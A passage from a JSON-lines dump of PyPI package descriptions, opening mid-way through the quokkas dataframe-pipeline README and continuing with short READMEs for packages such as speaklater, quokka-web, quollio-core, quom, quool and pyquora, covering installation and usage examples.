df_test.stream(df_train)\n\n# make predictions\npreds = df_test.predict()\n\n# evaluate the results\n_, trues = df_test.separate()\nmse = np.mean((preds - trues)**2)So, quite easy indeed. Above we used thetrain_test_splitfunction to split the data into a training and a test set,\nbut what if we wanted to split data into multiple sets, e.g. for validation? For that we can use functionstrain_val_test_splitandsplit. Here are some examples:df = df.sample(10000)\n\n# default sizes for train_val_test_split are (0.8, 0.1, 0.1)\naccepts parameters train_size, val_size and test_size and can infer one of them if the others are specified\ndf_train, df_val, df_test = df.train_val_test_split(train_size=0.7, val_size=0.1)\n\n# the same result can be achieved with the split function\ndf_train, df_val, df_test = df.split(n_splits=3, sizes=(0.7, 0.1, 0.2))\n# equivalent to {n_splits=3, sizes=(7000, 1000, 2000)}, {sizes=(7000, 1000, 2000)}, {n_splits=3, sizes=(7000, 1000)}\n# since n_splits can be inferred from sizes and one remaining size can be inferred if n_splits is specified\n# if sizes are not specified at all, split function would split the data into n_splits approximately equal partsBy default, splitterkindis set toshuffled, other options includesequential(rows are not shuffled before\nsplit),stratified(preserves the same proportions of examples in each class of the provided column) andsorted(the\ndataframe is first sorted by a provided column, then a sequential split is performed). 
quokkas also offers a way to\nperform a k-fold split that is often used for cross-validation:df.targetize('target_return')\nmse = []\nfor df_train, df_test in df.kfold(kind='stratified', n_splits=3):\n df_train.scale('robust').winsorize(limits=(0.005, 0.005)).encode('onehot', drop='first').encode_dates(intrayear=True)\n df_train.fit(RandomForestRegressor())\n df_test.stream(df_train)\n preds = df_test.predict()\n trues = df_test.target\n mse.append(np.mean((preds - trues)**2))There is also a much easier way to perform cross-validation based on k-fold split in quokkas:def mse(y_true, y_pred):\n return np.mean((y_pred - y_true)**2)\nresult = df.cross_validate(estimator=RandomForestRegressor(), scoring=mse, cv=3, target='target_return')You can obtain the fitted models, training scores and predictions by settingreturn_estimator,return_train_scoreandreturn_predictionsparameters toTrue. The difference between the two approaches is that\nwhile using thecross_validatefunction is easier, it doesn't allow us to specify transformations to be performed on\nthe training and test data before fitting the model or making predictions - meaning it is still useful in most cases.Back to pipelining! Could we transform a completely new dataframe (say, some unlabeled data) in exactly the same way?\nWell, almost. As mentioned before, quokkas pipelines most of the dataframe operations. However, it does not keep track\nof column operations, or operations that involve other dataframes. How could we manage that?Well, nothing is easier! Quokkasdf.map()method allows us to pipeline any function that we might want to apply to a\ndataframe. We could use it like that:def add_columns(df):\n df['sales_cash_ratio'] = df['sales'] / df['cash'] \n df['return'] = df['price'].pct_change()\n df['return_squared'] = df['return'] ** 2\n df['target_return'] = df['return'].shift(-1)\n return df # it is critical to return the dataframe in a function that will be \"mapped\"\n\ndf.map(add_columns)\ndf.targetize('target_return').scale('robust').encode('onehot', drop='first')\n\ndf_new = qk.read_csv('test_data.csv')\n\n# stream all the changes - now with the pipelined column operations!\ndf_new.stream(df)\npreds = df_new.predict()A trained pipeline of a dataframe can be easily saved (as long as all transformations in it can be pickled). This is\nhow we can do that:# save\ndf.pipeline.save('path.pkl')\n\n# load\npipeline = qk.Pipeline.load('path.pkl')\n\n# visualize the pipeline\nprint(pipeline)\n\n# apply loaded pipeline to a new dataframe\ndf_new.stream(pipeline)As discussed above, all quokkas-native preprocessing functions (i.e. encode, scale, encode_dates, impute, winsorize,\ntrim) are saved in the pipeline, and an arbitrary function on a dataframe can be added to the pipeline via map. Most of\nthe dataframe's member functions that transform the dataframe in some way are also added to the pipeline (\"pipelined\")\nautomatically. 
Here is a list of the pipelined functions:df.abs() # this function got an additional inplace parameter compared to pd implementation\ndf.aggregate()\ndf.apply()\ndf.applymap()\ndf.asfreq()\ndf.astype()\ndf.bfill()\ndf.clip()\ndf.corr()\ndf.cov()\ndf.diff()\ndf.drop_duplicates()\ndf.drop()\ndf.droplevel()\ndf.dropna()\ndf.explode()\ndf.ffill()\ndf.fillna()\ndf.filter()\ndf.interpolate()\ndf.melt()\ndf.pipe()\ndf.pivot()\ndf.query()\ndf.rename_axis()\ndf.rename()\ndf.reorder_levels()\ndf.replace()\ndf.reset_index()\ndf.round()\ndf.select_dtypes()\ndf.shift()\ndf.sort_index()\ndf.sort_values()\ndf.stack()\ndf.swapaxes()\ndf.swaplevel()\ndf.targetize()\ndf.to_datetime() # similar in functionality to pd.to_datetime), but the user provides column labels instead of dataframe\ndf.to_period()\ndf.to_timestamp()\ndf.transform()\ndf.transpose()\ndf.unstack()The following member functions preserve the pipeline without adding themselves to it:df.align()\ndf.append()\ndf.asof()\ndf.combine()\ndf.combine_first()\ndf.corrwith()\ndf.dot()\ndf.get()\ndf.iloc[]\ndf.join()\ndf.loc[]\ndf.mask()\ndf.merge()\ndf.reindex()\ndf.sample()\ndf.set_axis()\ndf.set_index()\ndf.update()\ndf.where()\ndf.__getitem__() # i.e. df[['column_one', 'column_two']] preserves pipelineAdditionally, all arithmetic operations preserve the pipeline of the left element. As you might have noted, all\noperations that require another dataframe / series to work are not pipelined. This ensures that the pipeline does not\nbecome too large. Of course, if the user wants to pipeline these operations, they can do it via map - as dicussed above.If the user does not wish to pipeline a certain operation, they could turn a pipeline of the dataframe off. There are\ntwo principal ways to do that:# disable the pipeline\ndf.pipeline.disable()\n\ndf.abs(inplace=True) # won't be pipelined\n\n# enable the pipeline\ndf.pipeline.enable()\ndf.abs(inplace=True) # will be pipelined\n\n# the pipeline can also be disabled via context manager:\nwith df.pipeline:\n df.abs(inplace=True) # will not be pipelinedEvery selection operation preserves the pipeline (provided that the result of the operation is a dataframe). In\nparticular, each timedf.iloc[]is called, the pipeline of the original dataframe is copied. This makes those\nselection operations a little bit slower. There is a solution for that: quokkas provides a functionality to completely\nlock all pipeline operations viaqk.Lock.global_lock()(which can be reversed withqk.Lock.global_unlock()). There\nis also a convenient context manager:with qk.Lock.lock():\n df = df.scale('minmax')encode('ordinal').encode_dates(intraweek=True) # none of the operations will be pipelinedNote the difference: disabling the pipeline prevents transformations from being added to the pipeline, while the global\nlock prevents any operation on the pipeline. 
In particular, even when using operations that would generally preserve the\npipeline, with a global lock the pipeline might not be preserved!Now that we have discussed how the pipelining works for quokkas dataframes, we can move to the last important feature of\nthis package:Exploratory Data AnalysisQuokkas provides some very useful (in our unbiased opinion) capabilities to help the user understand the data better.\nSome provided functions are fairly standard:\nfor instance, the user can visualize the correlation matrix, create scatter plots for features / target variable\n(recommended if the target values are continuous), create density plots of features for each distinct value of the\ntarget variable as well as plot missing values for all features (and, if necessary, target). Here is an example of the\ninterface:# correlation plot\ndf.plot_correlation(auto=True, include_target=False, absolute=True, style='seaborn')\n\n# scatter plot, n_line_items corresponds to the number of plots in one line\ndf.plot_scatter(include=['col_1', 'col_2', 'col_3', 'col_4'], auto=False, n_line_items=2)\n\n# density plot (kde)\ndf.plot_density(auto=True, n_line_items=3)\n\n# missing values plot, reverse=False means that the shares of missing values will be plotted\n# otherwise, shares of present values would be plotted instead\ndf.plot_missing_values(reverse=False, figsize=(12, 5))Of course, the target for scatter and density plots should be provided to the dataframe via the targetize member\nfunction. An attentive reader might guess that the 'include' / 'exclude' / 'auto' logic here is the same as for the\npreprocessing functionality. By default, 'auto' is enabled, so in most cases the user does not need to provide any\narguments at all. Every charting function in quokkas allows the user to choose the style of the chart (string\ncorresponding to one of the plt.styles via style argument) and the figure size (via figsize argument).Additionally, quokkas provides a bit of non-standard charting functionality: the user may wish to view how the feature\nvalues depend on the values of the target. The functiondf.plot_feature_means()does exactly that. If the target\nvariable is continuous, the user may provide an integer 'buckets' argument - the target variable values will be split\nin that many quantiles and the mean of each variable will be plotted for each of the quantiles. In the case when the\ntarget variable is categorical, the means of feature values will be plotted for each distinct value of target variable.The user can specify if the target variable should be considered continuous or categorical via 'kind' argument: e.g.df.plot_feature_means(kind='categorical')ordf.plot_feature_means(kind='continuous'). By default, the kind\nparameter is set to 'default', which means that quokkas will attempt to infer the type of the target variable itself.This plot can be quantified in a simple way as well - for that, the user can use thedf.feature_importance()function.\nThis function calculates the variance of the means of the standardized feature values among different buckets / distinct\nvalues, corrects that variance with the expected variance of the means of the buckets / distinct values and returns the\nshare of this corrected variance for each feature.The last EDA function that we will cover is very simple:df.suggest_categorical(strategy=...)suggests the features\nthat should be considered categorical. It has the following strategies: 'count', 'type' and 'count&type'. 
If 'count' is\nselected, the decision will be based on the number of distinct feature values (if there are fewer than min(cat_number,\ncat_share*n_rows), the feature will be considered categorical, where cat_number and cat_share are parameters with\ndefault values 20 and 0.1). If 'type' is selected, the categorical features will be selected based on column type, and\nif 'count&type' is selected, all columns that would be selected under 'type' and 'count' strategies would be selected.We hope that you have a lot of fun working with quokkas! If you have any issues or suggestions - please feel free to\ncontact us! We will do our best to help!"} +{"package": "quokka-sharp", "pacakge-description": "Quokka Sharp for simulating and equivalence checking\nof quantum circuits based on weighted model counting.\nYou have to intall a weighted model counting tool first."} +{"package": "quokka-speaklater", "pacakge-description": "A module that provides lazy strings for translations. Basically you\nget an object that appears to be a string but changes the value every\ntime the value is evaluated based on a callable you provide.For example you can have a globallazy_gettextfunction that returns\na lazy string with the value of the current set language.Example:>>> from speaklater import make_lazy_string\n>>> sval = u'Hello World'\n>>> string = make_lazy_string(lambda: sval)This lazy string will evaluate to the value of thesvalvariable.>>> string\nlu'Hello World'\n>>> unicode(string)\nu'Hello World'\n>>> string.upper()\nu'HELLO WORLD'If you change the value, the lazy string will change as well:>>> sval = u'Hallo Welt'\n>>> string.upper()\nu'HALLO WELT'This is especially handy when combined with a thread local and gettext\ntranslations or dicts of translatable strings:>>> from speaklater import make_lazy_gettext\n>>> from threading import local\n>>> l = local()\n>>> l.translations = {u'Yes': 'Ja'}\n>>> lazy_gettext = make_lazy_gettext(lambda: l.translations.get)\n>>> yes = lazy_gettext(u'Yes')\n>>> print yes\nJa\n>>> l.translations[u'Yes'] = u'Si'\n>>> print yes\nSiLazy strings are no real strings so if you pass this sort of string to\na function that performs an instance check, it will fail. In that case\nyou have to explicitly convert it withunicodeand/orstringdepending\non what string type the lazy string encapsulates.To check if a string is lazy, you can use theis_lazy_stringfunction:>>> from speaklater import is_lazy_string\n>>> is_lazy_string(u'yes')\nFalse\n>>> is_lazy_string(yes)\nTrueNew in version 1.2: It\u2019s now also possible to pass keyword arguments to\nthe callback used withmake_lazy_string."} +{"package": "quokka-twill", "pacakge-description": "A scripting system for automating Web browsing. Useful for testing\nWeb pages or grabbing data from password-protected sites automatically."} +{"package": "quokka-web", "pacakge-description": "Quokka - Browser Automation Library with PlaywrightQuokka is a powerful Python library built on top of Playwright, designed to simplify browser automation and manipulation tasks. It provides a convenient facade for various browser interactions, making it easier to navigate web pages, extract data, and interact with page elements.Key FeaturesAsynchronous and Parallel Execution:Quokka operates entirely in an asynchronous manner. Leveraging the power of Playwright, it utilizes multiple processes, each containing a single coroutine, for efficient parallel execution. 
This architecture excels in handling both IO and CPU-bound workloads when ample resources are available.Multi-threaded Crawling with Ease:Quokka'sBaseCrawlerclass enables users to effortlessly transition from single-threaded to multi-threaded crawling. By taking advantage of the provided crawler template, you can seamlessly convert a single-threaded crawler into a multi-threaded one.Easy Browser Management: Quokka'sAgentclass provides a streamlined interface for managing browser instances, including starting, stopping, and page navigation.Data Extraction: With thedata_extractormodule, Quokka allows you to easily extract data from web pages using customizable selectors and extraction patterns.Page Interaction: Thepage_interactormodule enables you to interact with web page elements, such as clicking, typing, and scrolling, making automation tasks a breeze.Custom Hooks: Quokka supports customizable hooks, allowing you to extend and customize the behavior of theAgentclass to fit your specific needs.Extensible: Quokka exposes Playwright'splaywrightandpageinstances, enabling users to extend the library's functionality as required.Installationpipinstallquokka-webGetting StartedQuokka's intuitive API makes browser automation a straightforward process. Here's a simple example:fromquokka_webimportAgentasyncdefmain():agent=awaitAgent.instantiate(headless=True)awaitagent.start()# Your automation code hereawaitagent.stop()if__name__==\"__main__\":importasyncioasyncio.run(main())DocumentationFor detailed usage instructions, examples, and customization options, please refer to theDocumentation.ExamplesBase Crawler Example:fromquokka_webimportBaseCrawler,DebuggerclassMyCrawler(BaseCrawler):asyncdef_crawl(self,*args,**kwargs):# Core crawling logic using browser_agentif__name__==\"__main__\":importasyncioasyncdefmain():crawler=awaitMyCrawler.instantiate(debug_tool=Debugger(verbose=True))awaitcrawler.start()awaitcrawler.crawl()awaitcrawler.stop()asyncio.run(main())ContributingContributions to Quokka are welcome! Please read ourContribution Guidelinesfor more information on how to contribute to the project.LicenseThis project is licensed under theMIT License."} +{"package": "quoll", "pacakge-description": "quollImage quality assessment for electron tomographyInstallationUsers who prefer graphical user interfaces (i.e. Napari)Find Quoll's Napari plugin (napari-quoll)hereUsers (pip)Create a new conda environment, name it whatever you'd like, but don't forget to activate itconda create -n quoll python=3.7\nconda activate quollPip installpip install quollDevelopersClone the repository. In a terminal:git clone https://github.com/rosalindfranklininstitute/quoll.gitNavigate to the Quoll directory and create a new conda environment for Quoll. 
Don't forget to activate this environmentconda env create -n quoll python=3.7\nconda activate quollPip install the quoll packagepip install -e .ExamplesTheexamplesfolder contains Jupyter notebooks for example usage.Alternatively thetestsalso go through some ways of using quoll.CLI Usage examplesTo use the one-image FRC in the command line, once Quoll is installed.oneimgFRC -hbrings up the help options for the one image FRCTo run the one image FRC on a single image without tiling (i.e., estimate resolution of the entire image),oneimgFRC To run the one image FRC on a single image split into square tiles of lengthnpixels,oneimgFRC --tile_size --tiles_dir The resolution results, resolution heatmap, and the overlay of the resolution heatmap on the image can be saved with the flags--save_csv,--save_overlay,--save_heatmap.The resolution heatmap overlaid on the original image can be displayed with the--show_plotflag."} +{"package": "quoll-compatible-miplib", "pacakge-description": "No description available on PyPI."} +{"package": "quollio-core", "pacakge-description": "quollio-coreDescription (\u8aac\u660e)This Python library collects advanced metadata like table to table lineage or anomaly record and ingests them to QDC.\u3053\u306ePython\u30e9\u30a4\u30d6\u30e9\u30ea\u306f\u3001\u30c6\u30fc\u30d6\u30eb\u9593\u306e\u30ea\u30cd\u30fc\u30b8\u3084\u30c7\u30fc\u30bf\u306e\u7d71\u8a08\u5024\u306a\u3069\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3092\u53d6\u5f97\u3057\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u306e\u30a2\u30bb\u30c3\u30c8\u306b\u53cd\u6620\u3057\u307e\u3059\u3002Prerequisite (\u524d\u63d0\u6761\u4ef6)Before you begin to use this, you need to do the following.Add your assets to QDC with metadata agent.Issue client id and client secret on QDC for External API.\u3053\u306e\u30b7\u30b9\u30c6\u30e0\u3092\u4f7f\u7528\u3059\u308b\u524d\u306b\u3001\u4ee5\u4e0b\u306e\u624b\u9806\u3092\u5b9f\u884c\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002Metadata Agent\u3092\u4f7f\u7528\u3057\u3066\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u306b\u30a2\u30bb\u30c3\u30c8\u3092\u767b\u9332\u3059\u308b\u3002\u5916\u90e8API\u7528\u306e\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u4e0a\u3067\u8a8d\u8a3c\u306b\u5fc5\u8981\u306a\u30af\u30e9\u30a4\u30a2\u30f3\u30c8ID\u3068\u30b7\u30fc\u30af\u30ec\u30c3\u30c8\u3092\u767a\u884c\u3059\u308b\u3002Install (\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)Install with the following command.\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ pip install quollio-coreTo see available commands and options, please run the following command. 
(ex: Snowflake)\u30b3\u30de\u30f3\u30c9\u3084\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002(\u4f8b: Snowflake)$ python3 -m quollio_core.snowflake -hThen run commands with the options provided.\u305d\u306e\u5f8c\u3001\u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u6307\u5b9a\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002Command (\u30b3\u30de\u30f3\u30c9)Description (\u6982\u8981)build_viewBuild views for lineage and statistics.\u30ea\u30cd\u30fc\u30b8\u3068\u7d71\u8a08\u60c5\u5831\u3092\u751f\u6210\u3059\u308b\u30d3\u30e5\u30fc\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002load_lineageLoad lineage from created views to Quollio.\u4f5c\u6210\u3057\u305f\u30d3\u30e5\u30fc\u304b\u3089\u30ea\u30cd\u30fc\u30b8\u30c7\u30fc\u30bf\u3092Quollio\u306b\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002load_statsLoad statistics from created views to Quollio.\u4f5c\u6210\u3057\u305f\u30d3\u30e5\u30fc\u304b\u3089\u7d71\u8a08\u60c5\u5831\u3092Quollio\u306b\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002Development (\u958b\u767a)Install (\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)Create.envfile in the root level of repository and set the following environment variables.\u30ea\u30dd\u30b8\u30c8\u30ea\u306e\u30eb\u30fc\u30c8\u30ec\u30d9\u30eb\u306b.env\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u3001\u4e0b\u8a18\u306e\u74b0\u5883\u5909\u6570\u3092\u8a2d\u5b9a\u3057\u3066\u304f\u3060\u3055\u3044\u3002AWS_REGION=[AWS region]\nIMAGE_NAME=[Container image name you want to use]To install local packages, run the following command.\u30ed\u30fc\u30ab\u30eb\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make installBuild (\u30d3\u30eb\u30c9)To build Docker image with local files, run the following command.\u30ed\u30fc\u30ab\u30eb\u30d5\u30a1\u30a4\u30eb\u3067Docker image\u3092\u30d3\u30eb\u30c9\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make build-localUnit test (\u30e6\u30cb\u30c3\u30c8\u30c6\u30b9\u30c8)To run unit tests, run the following command.\u30e6\u30cb\u30c3\u30c8\u30c6\u30b9\u30c8\u3092\u5b9f\u884c\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make testDocs (\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8)To auto generate docs for dbt, run the following command. (ex. Snowflake)dbt\u306e\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u81ea\u52d5\u751f\u6210\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002(\u4f8b: Snowflake)$ cd quollio_core/dbt_projects/snowflake\n$ dbt-osmosis yaml refactor \\\n--force-inheritance \\\n--project-dir ./ \\\n--profiles-dir ./profiles \\\n--vars '{query_role: , sample_method: SAMPLE(10)}'Push (\u30d7\u30c3\u30b7\u30e5)The push command inMakefileis for pushing the image to ECR. 
If you want to push the image to other container registry, please change the command.Makefile\u306epush\u30b3\u30de\u30f3\u30c9\u306f\u3001ECR\u306b\u30a4\u30e1\u30fc\u30b8\u3092\u30d7\u30c3\u30b7\u30e5\u3059\u308b\u305f\u3081\u306e\u3082\u306e\u3067\u3059\u3002\u4ed6\u306e\u30b3\u30f3\u30c6\u30ca\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u30a4\u30e1\u30fc\u30b8\u3092\u30d7\u30c3\u30b7\u30e5\u3059\u308b\u5834\u5408\u306f\u3001\u30b3\u30de\u30f3\u30c9\u3092\u5909\u66f4\u3057\u3066\u304f\u3060\u3055\u3044\u3002License (\u30e9\u30a4\u30bb\u30f3\u30b9)This library is licensed under the AGPL-3.0 License, but the dependencies are not licensed under the AGPL-3.0 License but under their own licenses. You may change the source code of the dependencies within the scope of their own licenses. Please refer topyproject.tomlfor the dependencies.\u3053\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306fAGPL-3.0\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u4f9d\u5b58\u95a2\u4fc2\u306fAGPL-3.0\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u306f\u306a\u304f\u3001\u305d\u308c\u305e\u308c\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u4f9d\u5b58\u95a2\u4fc2\u306e\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306f\u3001\u305d\u308c\u305e\u308c\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u306e\u7bc4\u56f2\u5185\u3067\u5909\u66f4\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4f9d\u5b58\u95a2\u4fc2\u306b\u3064\u3044\u3066\u306f\u3001pyproject.toml\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002"} +{"package": "quollio-data-profiler", "pacakge-description": "quollio-data-profilerDescriptionThis system collects advanced metadata like table to table lineage or anomaly record and ingests them to QDC.PrerequisiteBefore you begin to use this, you need to do the following.Add your assets to QDC with metadata agent.Issue External API client id and client secret on QDC.InstallInstall with the following command.pip install quollio-data-profilerUsageHere is an example of creating a view for snowflake lineage. Please enter any values for <>.from quollio_data_profiler.repository.qdc import QDCExternalAPIClient\nfrom quollio_data_profiler.repository.snowflake import SnowflakeConnectionConfig\nfrom quollio_data_profiler.snowflake_lineage_profiler import execute\n\n\ndef view_build_only():\n company_id = \"\"\n build_view_connection = SnowflakeConnectionConfig(\n account_id=\"\",\n account_role=\"\",\n account_user=\"\",\n account_password=\"\",\n account_warehouse=\"\", \n )\n qdc_client = QDCExternalAPIClient(\n client_id=\"\",\n client_secret=\"\",\n base_url=\"\",\n )\n execute(\n company_id=company_id,\n sf_build_view_connections=build_view_connection,\n qdc_client=qdc_client,\n is_view_build_only=True,\n )\n\nif __name__ == \"__main__\":\n view_build_only()Please refer to the scripts in./examplesfor other usages.DevelopmentHow to testUnittestRunmake test"} +{"package": "quom", "pacakge-description": "QuomQuom is a single file generator for C/C++.It resolves all included local headers starting with your main C/C++ file. 
This is also known as amalgamation.Afterwards, it tries to find the related source files and their headers and places them at the end of the main file\nor at a specific stitch location if provided.At the end there will be one single file with all your header and sources joined together.Installationpip install --user quomRequires Python 3.7 or later.How to use itusage: quom [-h] [--stitch format] [--include_guard format] [--trim]\n input output\n\nSingle header generator for C/C++ libraries.\n\npositional arguments:\n input Input file path of the main file.\n output Output file path of the generated single header file.\n\noptional arguments:\n -h, --help show this help message and exit\n --stitch format, -s format\n Format of the comment where the source files should be placed\n (e.g. // ~> stitch <~). Default: None (at the end of the main file)\n --include_guard format, -g format\n Regex format of the include guard. Default: None\n --trim, -t Reduce continuous line breaks to one. Default: True\n --include_directory INCLUDE_DIRECTORY, -I INCLUDE_DIRECTORY\n Add include directories for header files.\n --source_directory SOURCE_DIRECTORY, -S SOURCE_DIRECTORY\n Set the source directories for source files.\n Use ./ in front of a path to mark as relative to the header file.\n --encoding ENCODING, -e ENCODING\n The encoding used to read and write all files.Simple exampleThe project:|-src/\n| |-foo.hpp\n| |-foo.cpp\n| -main.cpp\n|-out/\n -main_gen.cppfoo.hpp#pragma onceintfoo();foo.cpp#include\"foo.hpp\"intfoo(){return0;}main.cpp#include\"foo.hpp\"intmain(){returnfoo();}The command:quom src/main.hpp main_gen.cppmain_gen.cppintfoo();intmain(){returnfoo();}intfoo(){return0;}Advanced exampleThe project:|-src/\n| |-foo.hpp\n| |-foo.cpp\n| -foobar.hpp\n|-out/\n -foobar_gen.hppfoo.hpp#pragma once#ifndef FOOBAR_FOO_HPP#define FOOBAR_FOO_HPPexternintfoo;#endiffoo.cpp#include\"foo.hpp\"intfoo=42;foobar.hpp#pragma once#ifndef FOOBAR_HPP#define FOOBAR_HPP#include\"foo.hpp\"#endif#ifdef FOO_MAIN// ~> stitch <~#endifThe command:quom src/foobar.hpp foobar_gen.hpp -s \"~> stitch <~\" -g FOOBAR_.+_HPPfoobar_gen.hpp#pragma once#ifndef FOOBAR_HPP#define FOOBAR_HPPexternintfoo;#endif#ifdef FOO_MAINintfoo=42;#endifTake a look into theexamples folderfor more."} +{"package": "quool", "pacakge-description": "QuoolFinancial Data Analysis ToolkitThis toolkit provides a comprehensive suite of modules for financial data analysis, including web requests, data processing, and logging. Designed with ease of use and efficiency in mind, it's an ideal solution for analysts and developers working in financial data analytics.FeaturesRequest Module: Interfaces with various financial data APIs and web scraping for stock market information.Tool Module: A collection of utility functions for data parsing, logging, memory optimization, and more.Custom Logging: Enhanced logging capabilities for both console and file output with customizable formats.Modules1. Request ModuleHandles various types of web requests and interactions with APIs. It includes classes for:AkShare: Fetching financial data using the AkShare API.Em: Interacting with East Money (\u4e1c\u65b9\u8d22\u5bcc\u7f51) for financial data and analysis.StockUS: Accessing US stock market data and research reports.WeiXin: Interfacing with WeChat for functionalities like QR code-based login and notifications.2. 
Tool ModuleProvides utility functions and classes to support operations such as:Logger: Enhanced logging with configurable display options.Date Parsing: Converts date strings intopandas.Timestampobjects.Memory Optimization: Reduces memory usage of pandas DataFrames.InstallationTo use this toolkit, clone the repository to your local machine:bashCopy codegit clone https://github.com/ppoak/quoolUsageHere's a quick example of how to use theAkShareclass to fetch daily market data:pythonCopy codeimport quool.request as qr\ndaily_data = qr.AkShare.market_daily('600000', start='20200101', end='20201231')For logging:pythonCopy codeimport quool.tool import qt\nlogger = qt.Logger(name=\"MyLogger\", level=logging.INFO, file=\"log.txt\")\nlogger.info(\"This is an info message\")ContributingContributions to improve this toolkit are welcome. Please fork the repository and submit a pull request with your changes.LicenseThis project is licensed underMIT License."} +{"package": "quora", "pacakge-description": "pyquora=======Note: parts of this library may be broken due to changes on Quora's end. Issues and pull requests welcome.----------------------------------------------------------------------------------------------------------|Build Status|A Python module to fetch and parse data from Quora.Table of Contents------------------ `Installation <#installation>`__- `Usage <#usage>`__- `Features <#features>`__- `Contribute <#contribute>`__- `Projects using ``pyquora`` <#projects-using-pyquora>`__Installation------------You will need `Python 2 `__.`pip `__ isrecommended for installing dependencies.Install using pip:::pip install quoraUsage-----User statistics~~~~~~~~~~~~~~~.. code:: pythonfrom quora import Useruser = User('Christopher-J-Su')# Get user activityactivity = user.activity# Do stuff with the parsed activity dataprint activity# Get user statisticsstats = user.stats# Take a ganderprint statsQuestions~~~~~~~~~.. code:: pythonfrom quora import Quora# Get question statisticsquestion = Quora.get_question_stats('what-is-python')# question is:# {# 'want_answers': 3,# 'question_text': u'What is python?',# 'topics': [u'Science, Engineering, and Technology', u'Technology', u'Electronics', u'Computers'],# 'question_details': None, 'answer_count': 1,# 'answer_wiki': '
',# }Answer statistics~~~~~~~~~~~~~~~~~.. code:: pythonfrom quora import Quora# The function can be called in any of the following ways.answer = Quora.get_one_answer('http://qr.ae/6hARL')answer = Quora.get_one_answer('6hARL')answer = Quora.get_one_answer(question, author) # question and answer are variables# answer is:# {# 'want_answers': 8,# 'views': 197,# 'author': u'Mayur-P-R-Rohith',# 'question_link': u'https://www.quora.com/Does-Quora-similar-question-search-when-posing-a-new-question-work-better-than-the-search-box-ove',# 'comment_count': 1,# 'answer': '...',# 'upvote_count': 5# }# Get the latest answers from a questionlatest_answers = Quora.get_latest_answers('what-is-python')Features--------Currently implemented~~~~~~~~~~~~~~~~~~~~~- User statistics- User activity- Question statistics- Answer statisticsTo do~~~~~- Detailed user information (followers, following, etc.; not juststatistics)"} +{"package": "quorabackup", "pacakge-description": "============quora-backup============A syncing approach to backing up Quora answers, questions, votes, and follows. Rather than fetching your entire history of Quora activity all at once, quora-backup checks your recent Quora activity and saves only the new entries. **Run it regularly to maintain a full backup.** This not only allows backups to be performed faster and more frequently, but also makes less requests to Quora's servers and doesn't face request rate-limiting issues like some older backup techniques do. It supports backing up to **JSON and CSV**. More file formats and databases to come.Installation============You will need [Python 2](https://www.python.org/download/). [pip](http://pip.readthedocs.org/en/latest/installing.html) is recommended for installing dependencies.$ git clone https://github.com/csu/quora-backup.git$ cd quora-backup$ pip install -r requirements.txtInstalling without git----------------------For the less technical users who want to use quora-backup without installing git:1. [Download quora-backup](https://github.com/csu/quora-backup/archive/master.zip) and extract the files from the `.zip` archive2. Open a terminal or command prompt window and enter the folder using `cd`3. Run `pip install -r requirements.txt` (after installing Python and pip)Usage=====$ python backup.py Christopher-J-Su # defaults to flat-file json backupsTo access the help for the options and arguments:$ python backup.py --helpUsage: backup.py [OPTIONS] USEROptions:-p, --path TEXT Specify a path at which to store thebackup files.-t, --type [answers|questions|upvotes|question_follows]Specify only one type of activity to bebacked up.-f, --format [json|csv] Specify a format for the backup. Defaultsto JSON.--help Show this message and exit. Show this message and exit.Backup Formats==============To specify a format for your backup:$ python backup.py --format csv Christopher-J-SuFor a list of available backup formats, read the help (see [Usage](#usage) section).JSON Backup Details-------------------Your content will be stored in the following files, in whatever directory you run the above command in:answers.jsonquestions.jsonupvotes.jsonquestion_follows.jsonCSV Backup 